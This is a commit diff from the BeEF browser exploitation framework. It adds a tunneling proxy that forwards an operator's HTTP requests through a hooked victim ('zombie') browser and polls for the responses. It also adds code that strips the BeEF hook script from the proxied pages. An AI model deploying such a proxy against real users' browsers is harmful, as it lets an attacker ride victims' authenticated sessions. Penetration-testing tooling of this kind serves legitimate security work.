(Fixes issue 9)

This is the first cut at the tunneling proxy - it is by no means perfect - but it should be functional.

git-svn-id: https://beef.googlecode.com/svn/trunk@849 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

beef.rb

@@ -27,9 +27,11 @@ BeEF::Migration.instance.update_db!
   
 BeEF::Console::Banner.generate
 
-# start the requester proxy
-#requester_proxy = BeEF::Requester::ProxyServer.instance
-#requester_proxy.start
+# start the http proxy if enabled in config.ini
+if (config.get('http_proxy_enable').to_i > 0)
+  http_proxy_zombie = BeEF::HttpProxyZombie.instance
+  http_proxy_zombie.start
+end
 
 # start the hook server
 http_hook_server = BeEF::HttpHookServer.instance

config.ini

@@ -14,6 +14,10 @@ http_dns = "localhost"
 # if running behind a nat set the public ip address here
 #http_public = "66.102.11.104"
 
+http_proxy_enable = 1
+http_proxy_bind_address = "127.0.0.1"
+http_proxy_bind_port = "6789"
+
 http_demo_path = "/demos/basic.html"
 http_panel_path = "/ui/panel"
 hook_file = "/hook.js"

lib/console/banner.rb

@@ -35,6 +35,12 @@ module Console
         puts detail_tab + "Demo URL:  http://#{host}:#{@configuration.get("http_port")}#{@configuration.get("http_demo_path")}"
       end
  
+       # if the proxy is enabled output the address
+      if (@configuration.get('http_proxy_enable').to_i > 0)
+        puts
+        puts detail_tab + "HTTP Proxy: http://#{@configuration.get("http_proxy_bind_address")}:#{@configuration.get("http_proxy_bind_port")}"
+      end
+  
       puts
       puts "Ensure you are running the latest framework version. Run 'svn update' to update"
       puts

lib/httpproxybase.rb

@@ -0,0 +1,24 @@
+require 'webrick/httpproxy'
+require 'webrick/httputils'
+
+module BeEF
+  class HttpProxyBase < WEBrick::HTTPProxyServer
+
+    # call BeEF::HttpProxyZombie.instance
+    include Singleton
+
+    attr_reader :config
+    
+    def initialize
+      @configuration = BeEF::Configuration.instance
+      @config[:Logger] = WEBrick::Log.new($stdout, WEBrick::Log::ERROR)
+      @config[:ServerType] = Thread
+      super(@config)
+    end
+
+    # remove beef hook if it exists
+    def remove_hook(res)
+      res.body.gsub!(%r'<script.*?http.*?exploit.js.*?</script>', '')
+    end
+  end
+end

lib/httpproxyzombie.rb

@@ -0,0 +1,42 @@
+require 'webrick/httpproxy'
+require 'webrick/httputils'
+
+module BeEF
+  class HttpProxyZombie < HttpProxyBase
+
+    attr_accessor :proxy_zombie_id
+
+    def initialize
+      @configuration = BeEF::Configuration.instance
+      
+      @config = {}
+      @config[:BindAddress] = @configuration.get('http_proxy_bind_address')
+      @config[:Port] = @configuration.get('http_proxy_bind_port')
+      @config[:ServerName] = "BeEF " + @configuration.get('beef_version')
+      @config[:ServerSoftware] =  "BeEF " + @configuration.get('beef_version')
+
+      proxy_zombie_id = nil
+
+      super
+    end
+
+    def service(req, res)
+      
+      # TODO implement which HB to target
+      if false 
+        return if proxy_zombie_id.nil? # check if zombie is set
+        zombie = BeEF::Models::Zombie.get(proxy_zombie_id)
+        return if not zombie # check if zombie is registered with beef
+      else                     
+        proxy_zombie_id = 1    
+      end                      
+
+      # blocking request
+      res = HttpProxyZombieHandler::forward_request(proxy_zombie_id, req, res)
+
+      # remove beef hook if it exists
+      remove_hook(res)
+
+    end
+  end
+end

lib/httpproxyzombiehandler.rb

@@ -0,0 +1,55 @@
+require 'webrick/httprequest'
+require 'webrick/httpresponse'
+
+module BeEF
+ 
+  module HttpProxyZombieHandler
+    
+    # Variable representing the Http DB model.
+    H = BeEF::Models::Http
+    
+    # This function will forward requests to the zombie and 
+    # the browser will perform the request. Then the results
+    # will be sent back to use
+    def forward_request(zombie_id, req, res)
+      
+      # Generate a id for the req in the http table and check it doesnt already exist
+      http_id = rand(10000)
+      http_db = H.first(:id => http_id) || nil
+      
+      while !http_db.nil?
+        http_id = rand(10000)
+        http_db = H.first(:id => http_id) || nil
+      end
+            
+      # Saves the new HTTP request to the db for processing by HB
+      http = H.new(
+        :id => http_id,
+        :request => req,
+        :method => req.request_method.to_s,
+        :domain => req.host.to_s,
+        :path => req.path.to_s,
+        :date => Time.now,
+        :zombie_id => zombie_id
+      )
+      http.save
+      
+      # Polls the DB for the response and then sets it when present
+      
+      http_db = H.first(:id => http_id)
+      
+      while !http_db.has_ran
+        sleep 1
+        http_db = H.first(:id => http_id)
+      end
+      
+      res.body = http_db.response
+        
+      res
+    end
+    
+    module_function :forward_request
+
+  end
+
+end

lib/loader.rb

@@ -57,6 +57,9 @@ require 'lib/server/httphandler'
 require 'lib/server/httpcontroller'
 
 require 'lib/server/httphookserver'
+require 'lib/httpproxybase'   
+require 'lib/httpproxyzombie'   
+require 'lib/httpproxyzombiehandler'
 
 require 'lib/server/assethandler'
 require 'lib/server/filehandler'